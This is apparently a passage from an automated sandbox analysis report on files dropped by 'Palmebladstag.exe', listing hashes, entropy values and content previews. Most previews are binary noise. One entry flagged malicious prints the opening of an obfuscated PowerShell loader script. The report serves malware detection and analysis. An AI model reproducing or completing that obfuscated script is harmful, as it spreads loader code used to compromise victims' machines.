                                          Malicious:false
                                          Preview:cicatrisive sifts tsardoms unstagily skyldsbevidstes maatterne skovbrugs.bgehjes klematissen showstopper organographist krydstjek sargonic foresprgselstidspunkt silhuetternes kattepotes polysulfonate..nodular vbnes advice appelsinsaftens ansvarsbevidst bengter,sneg opdigter perihepatitis billardkuglens krlighedserklringerne appreteringen bullwhips youngstown hemotherapeutics untenible revisionsprotokoller revellent jerff..referendummmets svovldioxidforurening disenamors smreknivs overhomeliness saltoerne remoulader.alterative territoriet fortoldede timebetaling increasable broadenings.
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2094
                                          Entropy (8bit):4.996890882173337
                                          Encrypted:false
                                          SSDEEP:48:9Z/PkTRQPJqR9pp2x46D0FD2mepj3PDv81:9ZQQ4R9PmqD3Oj/DU1
                                          MD5:1E42822E5AD2BF2B984A4FB6E132E228
                                          SHA1:E7AEA7E89D334944361A811DA1D15B616F940FB4
                                          SHA-256:0ABA58DC75AF71E8A13257C9EE5CCFFD4C84F458EAB6E2D0C48E5131F53A8494
                                          SHA-512:C884B5817EEF848677578783B67E27EDB83341C452681D74A506D9289A5FE5B5B97B4083CA80D5C92BD08DCCEE3D1BA1D1C8CE4E5BAD73717010418199CE7A6D
                                          Malicious:false
                                          Preview:...|X._.W........B...L.....Hl................<......M.~;......0..#o...i.......~........\..X...j.........V....t.....G...wV..............r..^..s...4............B......z.(..:.....l:.L...a..[o.....u...e..0.....1.......{../R....].......|.....\.....JL........2c...a.;...*..@..._.].D.......o....N....6.....b........>........j.4..#v....h.*"................V.....O.....1..B.x...............Y........7..Q.......b..E./..2...'.....H............Bt...........OS.T.O...............d:.......................P"...........5..........A...D......$.{.*........&...........sd`.......\42....X..x..R.C%...........`........M3....HI....PH.5.N4.{.......6@..{........=...7..\Y........4....L...Q.<.................n!.=..R....e....r..y............8{../....................i............./....`........H.........ub..-*............w...j..`..pj......5.i.....l. ....,..-~..Y..;.@.........|..D",.....m....... v.._....................}..........=..E..............................[...............K......O[.O........,&.....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3268
                                          Entropy (8bit):4.719312129064376
                                          Encrypted:false
                                          SSDEEP:96:p1MX+6gkYHJdQFpvHIT7suzN5xrtE/GXo2uDZ5j:7E+xHJdGBofslIo2+R
                                          MD5:FB3A3288B52829863EC8346CC36E30B4
                                          SHA1:FD8D917677FEE11D668BCC20EB2DFC23F8B84ADB
                                          SHA-256:951D01CFFBF94D083AF237F9168E809DCFB830472696287FD12DF2C70FD8DDFF
                                          SHA-512:8CD832717FE24A8BA0F33085A555F90498715A1E6D7C2FD47877AF802FCC8D343BA9B274BCA874A98D3BCB0E61F136A51ABD0D3A483BB081E15714C09B0A6F15
                                          Malicious:false
                                          Preview:.....%b...............{Q........s.....B.^6...I...L>.K............<......................5...!D.......\....q...|X......Y...|........*.]....)1...@.3.JP.......J...)..........Q..<.u./.........9....N......................>..\...............Z....H...............O.ps.....k..>O.........................R..W...:....z..<.4.._.%`..l.o...I....X........R...............a......lH......&...w.-$nA.......o............_G..Y.....t.S7.........:...0rm.9.....a.....5.d/j.[........_....d.....2..3...X..-......7....x............PY.......`....!..8..V.........~........fk....5...........y..}.....zV...................9......i...........C..V1.....B.......................5....0......8........`..&....5....C.......~......#.:b(..............7.+....7......l..........&Q....c.................4..m..MGJ......3.{.....u*.........sg.....P..m.].d.....F.v......).5K................C.q|.........v......C...*.......[......................1.}.[........(...f..R..Q.>..B...........W..$.........c....L...Zk.......^....w..........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2166
                                          Entropy (8bit):4.915135006409172
                                          Encrypted:false
                                          SSDEEP:48:Zykgri06+5KrJd3jYGpU4aK/n+ktvwNt5Pd2s736z:Zykg20z5KPfeK/fGb54+Kz
                                          MD5:42937543821DCED1D9422858CA33D09D
                                          SHA1:14D8C0E2FF12077B52787FF0F9FA6F6275A9533F
                                          SHA-256:9A1089085994119209F5CCF5CE1CC7D238BA5EE4FE15DD9D7B7E5DBE19E7100D
                                          SHA-512:FE1E28C441B8D25D827F3D8C4198E31A74DFA19590DC24CD129A23EA36092353FAA49DD1EA169DD7F1CF5A2D08A0CC681A61B852E2F965EE330D2716345AD6DE
                                          Malicious:false
                                          Preview:f......>F..h.....pU(.`.........1.t..0........................!..c.......8.W.......kS......Rh....r....V...{...b...}.....+.....M....4...... ..v...w.....3....XW.....z....b.....E..'..u4..........}...J......p.......7...W...0....W.......e......@I........x..........3.e..e...6v..W.........:........b.....R. ..........o...7._.............v....B..r{......I#.....,..........1............b....... ..........x............*y...O..!................h...;.t.Y....C.........Q.V.....;.@V%........3..4.X.]:-.........e.Z....M..[#.............G......*.........?...........g..A.................$.........~..y.7...U.............3....{..<...._l.....(.....^..k.......y....?.............. ............C.........P..4..+....@......rq.O..d..........[...@d...............>.C....Vg..Ta.[,.%..............Lh..............D.J.J...........-.......Y..{j..,/.S................ed......M....V....9...@.......1-................K...].a........~H..........P`T.\...u]../...................G.P........R...W........AO.........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1385
                                          Entropy (8bit):4.792538982995009
                                          Encrypted:false
                                          SSDEEP:24:6lEZjgQWX5mypwRhbeAyEKTGjnQGl6SLSIyesEw0xtKGN:H/HypchKAy8n3NSIKEwGH
                                          MD5:736259DA4E0D21FBA8C7F86ECB424CE3
                                          SHA1:03B0D554F01A5B876FA33E755016B3DFE389C0CD
                                          SHA-256:411A45E06EAAD98F70FF338B9F35E7D27BB2E7CA1376C93F5781DC394D0754C9
                                          SHA-512:C2726BE1E6AC60DE78D0649D6D187A955D5DBAD97ECE1C69EAF05AD4CA4C44ACD1C938DD0EAE3637497403439AE7B871931BE14020A46E7CEAA4F21E0D6CBC1E
                                          Malicious:false
                                          Preview:.........P.......Q9................6M...u.9l"..y.......0...x......'b..c......bC.............H....K...........s.S..W..j....L........I....a.....^..l.|.............N.w..o.A...y.......Y..T..w'.&.........+.......?...O\....2:...U*h........:..1...'p+.Q...u.B......58..'$,.)_......=.....p.......FN]O......e...r..d..............)........r.....;....W...<........a......~......b...............v....T-.........2................'/.K......V.......]...x.....r.....E.......C........j.....0..."..3...?.........d..O..|...*........F......R................`................\.4......<M....t.......)...............l......E}7].....|....................D..........p.2.#.......s.............F>.^...1.M..............m...........,..9......Ol..p..F...8f~..............................V.......-L.U.h..........t>.........W..`..Q3.9..M............Y.......E..U....s.&...................].......p......x..%.....,..>.........@..C....C.n.......N......{....hJ$....=.s..N.........S..........t.....b.-......3.q...:........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3190
                                          Entropy (8bit):4.927269760057116
                                          Encrypted:false
                                          SSDEEP:48:1lVucuPImu0ACWfr9anty10f8WfkzL3j0O1FWwqAaAPNkAKMHoLjgGbZp:6xO98ty1MvkL3j0O1FWWaAPNtTHuLP
                                          MD5:234CE727E39041D3195F40CA06D8A43F
                                          SHA1:D7F220DB5D0E9DDA32CA7A8D3401CE300F08AEC4
                                          SHA-256:24877A8D285D36AB1BF6A4E4B5C17E89F8130574B23F5E3C881BB042FB9B296D
                                          SHA-512:511C17C6E7CEC422549DEC4BA26E83F3D2790A513AE18EA6B9FC0F3FD0D97D28F7F50EF5CE333FAD40A0F8F07117958D3B4C2A9582634F79813052D1B3889F48
                                          Malicious:false
                                          Preview:....................8C......Rd.....].....j.........y..Y......U....j.....2...=.......-...@.......1.y..M.f...._|.]O...q.M7......._....:.......0....k...&P.C..90.......p.X.....l.v*..2..........*............~.....&....}......?.y......,...1s.........o....7Z...1....w.....................z.C.d#."...................8.Y...>..j...........k....#..bR.........h.......Y..@..2..50...............}....f......y<.......c..X..............e...........,...~2<....r.....b..,...........BZ2...........(...8........m.........T..2Qk.v.............K.....[.5.........Qo..x%....]...7...9.#......5....d...w...........I...6...F..d..L.3.......................................N..[$h..........{.3.p^......[..Y..........%O,.................=;.K.:~g.....X..].......L.D.......(.[.............)..l.....n.........P.!.X.....................9...................?...(.7....Y..z..cX......-........'Y........ ....HT.....C./...O....M...........x.E.....T...............w..j#...TD.......b...s.O....}h\..c.....8.&.p.'..B......X|.....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):4045
                                          Entropy (8bit):4.783473612673998
                                          Encrypted:false
                                          SSDEEP:48:DW1pmyr8U0r8M2KPJrOAXk9wnG4rayIqR6vVulSH4z2i/gaNkqwGADUiLyKhZiZJ:S1pEU0r8M3PBkAtedmgOvgayXDL2H
                                          MD5:0761965CA42467B1E02BDE6AF9B11D37
                                          SHA1:0A82C112E78E557E679AB7A6449ED140B783036D
                                          SHA-256:50E12F5D254E9E4C4B94548F9947AD669A65F7159CC12AE47605849A2D5CAE56
                                          SHA-512:447DA1A73DD9A0AF66CEFD93B368D984E1A39A8BF7CEE8C33EA65CDFC84576C70D0E776927931D6AF0611002F7EF9ECA7AE355DC23F391D3423AB9AB70E6DF53
                                          Malicious:false
                                          Preview:....v[..Pv..F...g.....<............d..&.nf._q.........wd............\....].f..z@~..jU3.......x...Rm....S.n....).......>..W..........._...(............^.......................w................f!l.v.......,............>...{.......c..."..\........c...................c..%....f..n................_...49..H...w..Y...n.....j.....-{.............I..........Q..g..iI..~..........^........(.......O..P...\"...=..P.......-%....G)..........A......A.......g.X.W.8........6.2o.....p...J9....oG........D{C.....S.j..................4.........%'c.............o9?.w......P.............z..........._.T{.rd...........J...................*.]u....E...................;...............w.....oT..Y.m...;.......3_........|.4..E..S.....F..........91..^.....7B.D.7..."..................9..<6......1........bc2..P.]............?...1....a...f............................F...c%..V......].%X...`...:kp....R. ...............O..Q......~..+..(.........7........9W..#.I.............H.4.......W...3#.....z...T.t,....../....N
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):1083
                                          Entropy (8bit):4.701853657199848
                                          Encrypted:false
                                          SSDEEP:24:WOBjANXAHp2LlfWinflqxXijPw3v2muICnaPEt53w:HcdASWXFvDRPB
                                          MD5:01345EE155D4FCDC8D8D245A96CAE404
                                          SHA1:6BFCCE136F15ADFCDF9E76443E26C9B340BFDED1
                                          SHA-256:F4285A40950C9FB35A4A1642BD84A52DE3E4F4319988E8D7CF0F44D65C7F466B
                                          SHA-512:A713D25C27426349CCC3857F5CCE85DE6E59180C46394D6CF7CA73E95C0F82C01D77B9E97BC179AFD2768A5672F03E001836D3A8169F271304B6F5588CA29BE6
                                          Malicious:false
                                          Preview:...............@...._.........+.......!9...G....................k.....q........ea<..q..........?.........j....H.,....o.1...f.zQc.E.........X..I.;...Y....q'..U..2................C...........68.q)..F....5......F..(..........6'xo8X.p......3#.p....K..>...DX.....%...YK............Y.....k...................@........./.......p..U..ES....=..s..^........3....e.........R..=.....l.....?.7..L.......<.....`.....7......c.B........@.3.....].w.z.7.....f.. .;.........Xt...t...=..hO.....,.......0...........8.i.&..{............o..............q.!......j..........8:..........I........]-..........I..f..........~...............S.F|......>.\.P...>....E.....KR......?....................2........._.............R...g.....n..<.2...........6..l.K..........c...K...c......V.K...........R.........(..po.`.'....V.....(......."..jS.........<.............{.....k"}<....xc.8.....x.............p..........0....~.A.......b..t.......p#....4z...........v."........Sq.f....O....(..z.........t......X...[..........k=..T
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                          Category:dropped
                                          Size (bytes):435476
                                          Entropy (8bit):6.815197114621854
                                          Encrypted:false
                                          SSDEEP:6144:ytUW4hJvgJgwEcbgYncl7eTtkD+YIJR181hzPNw3:yt14hldcMYnyeTtV/JRUre3
                                          MD5:68BA2D4874FC7C6774B9E3C499E02C4C
                                          SHA1:34F74E48206143B42FC4C9937738F7CE98B0272C
                                          SHA-256:C0C7CD49313CF197C292D41FE88B172B73B7B8AC9A778FDC070A7A34E46B2A7B
                                          SHA-512:37B74AC0A3223A4425F45C1C9189BDC0868D990137BF75E4013071F03DF444F3871789D5B12D58FDE28CF28338AB3D2D2421D4D73FBD1DFF5B9AE66E6B196134
                                          Malicious:false
                                          Preview:DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:ASCII text, with very long lines (52697), with no line terminators
                                          Category:dropped
                                          Size (bytes):52697
                                          Entropy (8bit):5.369401477012886
                                          Encrypted:false
                                          SSDEEP:1536:/6R3EFlgGHtVDk4jmqalwvpnjyjnK0QXFhCa:jlpNVkXqYYjyjGf
                                          MD5:EF462754FBE4A5D23FD0A945812563E1
                                          SHA1:4C17C0235CA28606BD32CEB7A54A0B2A96AB578F
                                          SHA-256:991A1022D720EE0DD8D0747446B1FBF8696EC078F7997D9B1095A90F8C6A7034
                                          SHA-512:361575FE004F60AC0C45AC30758AEE860235B92A2964A8AC8A1B70C2EE9CA7B123EA3440C08BDB7E9B14C9FE460D0D5DD6E9930174EA3EEE41C0ABA16D11E89C
                                          Malicious:true
                                          Preview:$Morsrbejdsgldernes=$Hoodwinking;<#Rundholtsgaffelens Yakitori Jarless Aalerusernes Hearthman Spilop Anastomos #><#Trukne Materielle jailmate #><#Sydlibanon originaldokumenterne Skivesnegles Centration Theiform Firtaktsmotorens Likker #><#Pragmat Offentlighedslovens Yalelaasen Dillie blad Disentraced Affder #><#Hjemstedskommuner Nonreversibly Clockradioers Sylphidine xanthosiderite Fylderisten Tryllelampens #><#Staumrels Homogeniseringerne Salrets #>$Shockable = "Nonpo;Afg.oFScho.u SpranProjecVermetKondiiSolp,o Solin S.mn ClappFBufonrVersiiB urgkjoviaaLy,trsCloths,fvike E.eueN.turrDunkenStudieHimm, Motiv(Trop,`$TrissP TrifiA,lgglJostlgInteraSysterStorclIn.raiPeppecPrfikkWahcoyScal.5Marxi9Egern,Exoti P,nta`$ PhonsUd.ono,hablwNecessBabbl Re,ns= rebo Torsk0Cocky)Stnin{Ragge.tsa t`$AflirSOvar cmaitrr EleciHalv.b.utraeTo,kn=Lu,ed- Rele3Star,5Conne2Ljtna7 Fare0C,ane+ Tr l3Banke5Lipop2Hinok7Forte2Komne;vesuv Pent inc, forma Af.al`$ Di,eMproceo.redirBrud sRitu,fTr basRepetv B.lloRasinvFortvl
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3529
                                          Entropy (8bit):4.884270281621404
                                          Encrypted:false
                                          SSDEEP:48:2ckCys/c1a3ZSxgSaXgUeCYu3HAA3OS7TS4TCT9x/GhvJyj1Vn4PddJ5C:2cNEs3ZX3opGW4If2JyxVn4nJ5C
                                          MD5:F70DFB2D640DDAC3E1C90736B3A73BB7
                                          SHA1:FD17B52EE254739D84B8B2F4592E0F3AE2971793
                                          SHA-256:166AAAD5D973CB16F5EC4130EB59696670EC73405CB867B5E35F66844D8E992A
                                          SHA-512:F1267F98247690CEFC0AD6A994AC298C4B831389720BC83E5838D1CFCF5D1126D32C6B9D8D0372C77FCD2FCDEAA2B6E98A056CA3C827395811CD3C75F6A958A0
                                          Malicious:false
                                          Preview:.........Y..........A.......`...S..g..........u.k.Z....|...eu|.........K..........T...t....R.......B...s.....Otq1.1...l..R..-.'......~Z.`..........|........d.G.....'...A............._S..b.`..............P.R....E....6n ...Z....g.Wv..d.......q.a......L............Q..W8X..............S..S..S........._...........^`..R%.z.c.L.......%....".......d..l~...az.........~$..#.c....`.....L.~............=.......V..)...........).....[R......l.$t..s...........C....r............................5.....T...........4..........<.......*.....p......................C......a.~..<.m..~/...l.......-.....x............>......9..a.=..$....*.....n..uP...!......8......p........z..q.{..........4...^#.%..*.........[........"....P.#..a./...........x.....`..V..D..G&.......a......y..C.jY/.....^..~$\..... h.1........p.......|.46...5.u.......E(.+.83..........<..P............=...P....:..........h..(........]..|.........e.........../...............Bl..O.Sz.......D........A..O*....\........~.......N.........7...|...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2050
                                          Entropy (8bit):4.712182926134389
                                          Encrypted:false
                                          SSDEEP:24:6IiEwhluLkMBDBW+e3MgA/JNQCVpXt+kiCKZ4yfh45nBf31f9puT/7uc:XiRhl6kM5BW+fgA/JMZ4w5/H
                                          MD5:114DBB60FE088C374B3C24F02743EA7D
                                          SHA1:C78902A7DACED4EA04088AC842491E0E214E767C
                                          SHA-256:1A881F6821C7ED9A8CDE27792414B9B3BC54E3B12E381FB9812CBB6A94D27FE8
                                          SHA-512:882449877883D86D006D009FDD19C81D7CEA1A663094D11B36EF34475EEB7401EF1952A8D4E3831CCFBC3868E15D842B12BDD90BC7E1FB5B3EEF6276FD9A2B6E
                                          Malicious:false
                                          Preview:6....H...........Z......1v.FI............."........@......e....=.A..-....Y.N..4.....Z............01............>....:g.......................A..D.....1.....].L...,a.......)........L..{........T......................T.......'..{.F.........R..h....r...2....,..'.....2..."G.HB.............".......b...<..b.....kqs.#...0*....=.tU..........e.$......~.B.......X..............X...A.T$"......,..s(}......B..E..............".g.M..|'..................6...<=........D5..Q...p.....-.?.......gr?..J......................~..l....w...-...(..............,.....:$.............x....O...?g....)...B.\......`.....#x.................<................x..`.m5...9...P.1....T.q.L.N......./l.o...X.....s...........*.%..?...#)2.......5............>..T.......H..t..........M..................6..qU...;..n......2c....s~\.........3....5..j...*..Gw.........O...~...,.........:i.......s..L.Z....../B......Rj|...c-.......P..Ca.........wC.n...%.....O..OzN8.........-y[..*.^F&.]_.........}.....s......<g........2.......A.........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2647
                                          Entropy (8bit):4.786676368351194
                                          Encrypted:false
                                          SSDEEP:48:9AuhBuElVZqJF9H9OPRoZIHRt/Q23yI7Mg7eKALB0xOj73lm5LMvijn:WO7lbwHBohQWlAlaOvY5LWA
                                          MD5:81B3BA771A4931A4E3211E4F12ABFDDF
                                          SHA1:87EB33AE9D73DB06FBAA1EDBA09A859C1A3EB91E
                                          SHA-256:4B5241A6F7F58E21B87CBBBEF486A05C228DD93A3306CF99068E54F39E7FF950
                                          SHA-512:C935A3C519ABE30A7843623ACB2D57C54CB1EAC1B9793AB8625CC0326F0F0D9D92BA38E92C3AA7184439DD336D11F7AA7236A5B0E816DFE872CC6553349DD2F9
                                          Malicious:false
                                          Preview:.......8..V................J...."c....................Kd. ....@...HEk.............I.I...d.............nO................_B..0..........U....}C...]q@.=............M..........J...#......f...1..4......Jx.nJ.[..............W..B..............7uc...h.......................W......y..9^...............................n...........E...p........l...~....2/.../.9...._..y......................I...........y..............{...<.....3..................._.t.......%.......9T......7...J.....-.M..........,../..........D.......g........D...u.2.H.............O.A..e..N........t...1.)......_...X....i...i.u...........G+.|........#....!...+G..........^.;.......y...A.......E.......W.e...|........_..&..w.....x..i<..v.0..q..'/.....X.b...m.G.............d..............Y...`.....7.'.uZC..>..[.....&...g....z../...........AU.(.?...k..!o...2...n......Y.."......e.m.\........4."....35{........2..J...<^Z........9.T....R..E.....A.............t..............R....d...*........V..................2..................S
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2959
                                          Entropy (8bit):4.855546784954658
                                          Encrypted:false
                                          SSDEEP:48:i9NKGlv8BODkckYVKuMzL2cc4wWrGqqK412JSHBbKYmzrjMrM0VFnplWQduD6:i98GlWODkvcKj/3rxj412SHRdmXgrM0L
                                          MD5:33EE9B72F46C690C452275D95ACEAD7C
                                          SHA1:B7F49F22A40FE7E1FF7D12A5CC18946F37D015C2
                                          SHA-256:8AECB386474D73A802D255D1ABA5B7413FDCDC8116635964BAFD311B2596D9D6
                                          SHA-512:FE135C823A440B05C24FEBC3F94F5D7F509E15C90FB282D1C93A94CDF5FF3560A98D3D43CD36F085D1BD8360F4EF2CE4F910694BBEF7A1F1F6C1966B4EC1E6CA
                                          Malicious:false
                                          Preview:.....p.E..............;.........R......G...z...p.&.F.. l.|....../.......S....B.o..._...v.......=..z.`..!.....^...f...........S.......z......X.................1.. ....O.....Y.......3=...(......=.f............|.......Y..{.........^h...Y.........g..1............{....................S........X....................3.\..*.........I.....:...O..........2........3..................9...............\...............5n.(..-..Y....[...J...........B.........&>....h...j...."9-IrWP....n..J...g......3............^59.................P.........^........<......+#..........K...l*..".Q!.M.......S.......P.......0....dB...v.Q..^...,v............$..........e...{...3.....F_..!........+.T.v............~...<....<S.c.................t....e.........9......n................3.......9..........x%...[....b...........$..............I...................Q..........................a............ ...N-X............l..k...:..m...u...D...;...'..fv......8........X............R...+)............10...............rL
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3458
                                          Entropy (8bit):4.880265484904919
                                          Encrypted:false
                                          SSDEEP:48:0N0zyzrL4ivYqQhPh9aykBBYudqp76bLV6eA/2Ax0Jz/Y25UQlBUg0cPgnzCfu:0n3k32KumebLVxAOAxw/bPUDcInOG
                                          MD5:049E2F21128FA9C31DE3B88E781A858D
                                          SHA1:BACC9909A09A37824AF49AD24376B961DC1798CB
                                          SHA-256:C6542F0BA0EFBF172CFB371ED852EA728ECF9629250AD8C7CB4D0397E81B2493
                                          SHA-512:071FA89319A2C13E4823F2F9B5AA5F71C831D3B1A84681FABDAA770FDFCC9BC3C82A8C1E1AF0E316925FF5B01244B0A82B6F07165B59D81DF7CEFF27A0ED9075
                                          Malicious:false
                                          Preview:i........}.g..7.O..w.Y.........x.....b....>.`v..M..............w.......M.....o.y..c.........@...z...:..^.U.......+............R.w...........:....=.k..}..BK@............q...S..8...Y...m...a..5.}......^7........)..a.9......O@I.......].......Z...T.....7....;....$.u......4.U....)..td..|.....Z....m.R.....6.f............0..........P3..('....,5.........6.....=............e..a.\`.i....F.............1.x.........p.i.....O.....:...+...]....'..............v.....#..j....:.......s............:...........7.........+.a!...................#n..%|...........G......E&.{.....}...[.$u......}..7.X.I..%....X......m.x.6.....b...9..............*6.....>.....7..............*..<....8.F.u......}.\._"nM.........".. .......5...W......q....0.......~...............z.j.....6.........E....B................U....:'...............P...#.........-T..L....:.m.L....}..`..x}.!.......`e...8.QF~.....^.......z...A........V.....7......-.........).T'..~....s./.....L...{..k..a.....]...:.......K.g......W.....P..n....u........^.
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2402
                                          Entropy (8bit):4.850122719214661
                                          Encrypted:false
                                          SSDEEP:48:a/Lg7tSdf9t2NY9pqRohgo7ia81P4gWYb/pQqoPymqzlKl/XZF:St2NY8Y7iapg5QtKb5OF
                                          MD5:1350BA16CDCA6A0D427260B3282E142A
                                          SHA1:D6EB766C4C2E49B0DD529F409377B777D5856776
                                          SHA-256:15683058DA7E87E377AE1CB10CFCAC62F10F93DE7012DA857F2F52908C332B59
                                          SHA-512:CD7281A8B71B0C82050EA9841770F67781E1D407EF6099E052C5DEA331A91900AA6E2799A58BF7CC8D46027B12472E948F2EF53278956A3690D79B1D8FEB1E46
                                          Malicious:false
                                          Preview:...............[.}..7..S.[......y......r:.l...\...+.....o.....y....E...c:........7q#.......U....1.....a....M....B...M....l}.....`.`.........m.u.......s.dv....v.....gD.....................\~........>..-.......'.2......uJ@K.."...........E....~.......X4#.......C..........d.1.....]@U......|.................E.............._..u........#...`...!.f.........X..".....\.............C...G.........p.........%n......6...v..3...#............A.p.........l.....................Ndx.......$......."............................H7.;|.....p....l...............,....c..M.....r........j...3.?.%.E....p...N.........'....G.$.p....f.b....'..~.|..t..........=........b......o........%...._1.f..w8".2.............p.................e...v.....%...]b.......@..g..R..\Vw2.....x.Y........:U......Z....VS............&....................K[...)-"#v.............d.*..%..?......O...i..............p...Q....A^..h.......rr..SH....R.........a..........Y....X...(.G........1..k.g..L......................2....T.....{MEb..S6...
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:OpenPGP Secret Key
                                          Category:dropped
                                          Size (bytes):4066
                                          Entropy (8bit):4.848386937779176
                                          Encrypted:false
                                          SSDEEP:96:WlCi91MS3XUEVSeP8vrLZ/5d0LhBDDPdYeRGUm:vM57d8vr95d0LXDDFYe5m
                                          MD5:F0AF9C57FBBA435629F5E74292F64C4C
                                          SHA1:CC48DF2BB3EDF0A8CF254AC56F4177A271ADFFC4
                                          SHA-256:859921D39F73D6162542BE299F6B88A924BCEF2CE8DF6612C73B243F2682485B
                                          SHA-512:79868D4020A4DAB72255B16E901D8CD7C7CB625BF9559BE0F9E7C9E43CBAA3E02F85FBCF420401EF01F116F5208E936A423B99225C074EB5203B18EFB36499EA
                                          Malicious:false
                                          Preview:.+.........!A....`....6..3f../.............?...........n"..3p..v.h..d.e...............YG8.H.............d,......u.....z....1..Cf..........8..}..........[..C.....X....C...d.....h<............0...........-................Y...D...D.........L(....!B....BK..............$.b...........+.....8..*....0&.K..M$......./...6..X./...P.i.x..".....'...................=....&...f..0...6.Y_..................6...v.l..#......g,(........C\................................A..L........o............H...Q..O...0.- W..............'j.........v. ......H...+......D.#...........l....x........x.M.....7..........J.'G.........[.....^......k...............xB......h...<........6........Y.....V.....K....A......E.......t..0................I......Y..|.2......S.....r.............-....^........~........O....].....^xk..{..ht....B.._....\.5.p...u#........y.....y....V......x.........|.`6................:.......l...\...........[.......g...q..\....Y.t.c...............S.........N.._..............................).\.....
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3609
                                          Entropy (8bit):4.855704425991137
                                          Encrypted:false
                                          SSDEEP:96:HUfqqfAcTnP44yYx6FLwXLr4C21PzWL0nMi16AOrlsNA:0VzTnP44jxrwC2Bz4hi16AOrlx
                                          MD5:55578E39A6407F7C87730656F272F42A
                                          SHA1:FECF21739332CC1BF23BF63B66B95E0673E03DF5
                                          SHA-256:9B3B0E211FF43874BFAC0D8228F0B7B44DD64A7F4A082E66C5A2EB279CC15F01
                                          SHA-512:B7FD02701987351C1DC40E1165FD533E6EFD7FE0956AB6AAFE71191BF031AA65A7C92AD1305D1C13D87AF006682D091B22243D0D3D423D78514D7DE47E46F5CD
                                          Malicious:false
                                          Preview:./!..f.Y.-........Nr......2.Y.E.................S....,...........L`..t............xf.....5.........^.....X.i....`..........TI.......f.L....I.............q....x.....v....2..........9pG;.............B...........p...k.+.>Ng...y.......]..............-...........5..A....F....:..]...........j.R......d........`..1..*o....q......&|.....z,.Y........n...`......b..'.....]....D........6..........k.......p..........k....f...f.............K.....................,x..i.b.............W.|....x..>.t........v(...E.5..................E.do....(.X..[.F....P..$..........(.........YOt*...........1........q..[......................#.......f.....y...u.......4.....[...D.D@.........A../..5.....A.......,...K.........a>.......T..........+0A..........).k.......8...!@._............{........h..-........D+..}V........-/......i.........................X.................>..`.=..w1...... ......AiI..u........*."....f5T...[..*i....W.............~.............g./~.........$}..O..0H........C......../PX...,...........
                                          Process:C:\Users\user\Desktop\Palmebladstag.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):3914
                                          Entropy (8bit):4.872036950613232
                                          Encrypted:false
                                          SSDEEP:96:OzOzIbWLHl6R91a5+8I0qflKTWjJ4mD5+eeFBhpoNoFRuU:jza4PsxfW/MI1poKJ
                                          MD5:50BF5C06B9C8AA4233F4F42276E11415
                                          SHA1:6E8F9E561E904CE51E1BC270B5E147D03E62D707
                                          SHA-256:17229772003D85AF0A79EA674C01F07F1BA5F860F923E71284CB4A6AE4B4AA2E
